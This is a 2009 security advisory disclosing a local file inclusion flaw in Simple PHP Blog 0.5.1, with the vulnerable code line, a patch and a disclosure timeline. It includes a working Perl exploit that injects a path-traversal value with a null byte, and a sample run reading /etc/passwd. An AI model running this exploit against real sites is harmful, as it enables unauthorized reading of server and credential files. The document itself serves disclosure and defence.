=============================================
INTERNET SECURITY AUDITORS ALERT 2009-005
Simple PHP Blog <= 0.5.1 Local File Include vulnerability
Simple PHP Blog is a blog system does not requires database setup, and
is very easy to install.
Simple PHP Blog <= 0.5.1 is affected by a Local File Include
vulnerability in 'languages_cgi.php' due to parameter 'blog_language1'
is not properly sanitized.
The affected code:
62 require_once('languages/' . $_POST[ 'blog_language1' ] .
'/strings.php');
Exploit:
#!/usr/bin/perl
use LWP::UserAgent;
if ($#ARGV < 3) { die("Usage: $0 <site> <path> <file> <cookie>"); }
$ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header('Cookie' => "sid=$ARGV[3]");
my $req = new HTTP::Request POST =>
"http://$ARGV[0]$ARGV[1]/languages_cgi.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content("blog_language1=…/…/…/…/…$ARGV[2]%00");
my $res = $ua->request($req);
if ($res->is_success) {
print $res->content;
} else {
print "Error: " .$res->status_line, "\n";
}
$ perl simple.pl example.com /blog /etc/passwd <my_cookie_here>|head -1
root:*:0:0:root:/root:/bin/bash
The bug can be exploited with or without 'magic_quotes_gpc', but note
that if magic_quotes_gpc is set to Off, an attacker can view any file,
adding a '\0' character like /etc/passwd, if not only can include php
files, allowing to execute any local php files.
The impact is the attacker can read arbitrary files in the context of
the webserver and execute arbitrary local php scripts.
Versions prior and including 0.5.1 are affected
In order to patch the application the function file_exists() and
basename() must be added to the affected code.
Change line 62 of languages_cgi.php in order to filter $_POST[
'blog_language1' ] variable.
if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ]))
require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');
http://www.simplephpblog.com
http://sourceforge.net/projects/sphpblog/
http://www.isecauditors.com
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
March 02, 2009: Initial release.
December 18, 2009: Last revision.
March 02, 2009: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 03, 2009: Notified to developer. No response.
December 13, 2009: Notified again. No response.
December 18, 2009: Added mitigation solution and sent to lists.
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.